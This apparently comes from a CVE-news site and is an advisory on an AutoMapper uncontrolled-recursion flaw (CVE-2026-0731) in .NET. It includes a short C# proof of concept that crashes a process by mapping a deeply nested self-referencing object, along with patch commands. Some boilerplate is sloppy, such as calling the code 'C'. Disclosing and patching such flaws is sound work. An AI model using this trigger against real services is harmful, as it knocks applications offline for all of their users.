AutoMapper, Uncontrolled Recursion, CVE-2026-0731 (High)

Listen to this Post

The vulnerability, formally identified as GHSA-rvv3-g6hj-g44x and published on March 13, 2026, resides in the core mapping engine of the AutoMapper library for .NET. It is a classic case of uncontrolled recursion leading to a Denial of Service (DoS). When AutoMapper is instructed to map an object graph that contains a circular reference—where an object has a property of its own type, leading to infinite nesting—the library attempts to traverse and map every level. Without any default limit on the depth of this recursion, an attacker can provide a specially crafted, deeply nested object (approximately 25,000 to 30,000 levels deep). This excessive recursion consumes all available stack memory for the executing thread, ultimately throwing a StackOverflowException. In modern .NET runtimes, this specific exception is unrecoverable and cannot be caught by standard `try-catch` blocks, forcing the entire application process to terminate immediately and causing a complete Denial of Service .

dailycve form:

Platform: AutoMapper
Version: < 16.1.1
Vulnerability : Uncontrolled Recursion
Severity: High
date: 2026-03-13

Prediction: March 2026

What Undercode Say:

Exploit:

The following C code demonstrates how an attacker can create a deeply nested object graph to trigger the stack overflow and crash the application .

// Define a class with a self-referencing property to create a circular graph
class Circular { public Circular Self { get; set; } }
// Setup AutoMapper configuration for the Circular type
var config = new MapperConfiguration(cfg => {
cfg.CreateMap<Circular, Circular>();
});
var mapper = config.CreateMapper();
// Construct a deeply nested object chain (30,000 levels deep)
var root = new Circular();
var current = root;
for (int i = 0; i < 30000; i++) {
current.Self = new Circular();
current = current.Self;
}
// This mapping call will crash the process due to StackOverflowException
mapper.Map<Circular>(root);

Protection from this CVE:

  1. Immediate Patching: Update the AutoMapper NuGet package to version 16.1.1 or later, where the default `MaxDepth` protection is implemented .
    Check your current AutoMapper version via NuGet CLI or Package Manager Console
    Update the package using Package Manager Console
    Update-Package AutoMapper -Version 16.1.1
    Or using the .NET CLI
    dotnet add package AutoMapper --version 16.1.1
    
  2. Defense in Depth: If an immediate update is not possible, review any custom `IObjectMapper` implementations or extension methods for potential recursive loops. Validate the depth of incoming object graphs before passing them to AutoMapper.

Impact:

  • Availability: A remote, unauthenticated attacker can crash the server, making the application completely unavailable. The CVSS v3.1 base score for this vulnerability is 7.5 (High) with the vector AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, highlighting the ease of exploitation and the severe impact on availability .
  • Process Termination: Unlike standard application exceptions that might only affect a single request, this vulnerability terminates the entire .NET process. This means all active users are disconnected, and the application remains offline until the process is automatically or manually restarted, amplifying the severity of the DoS .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top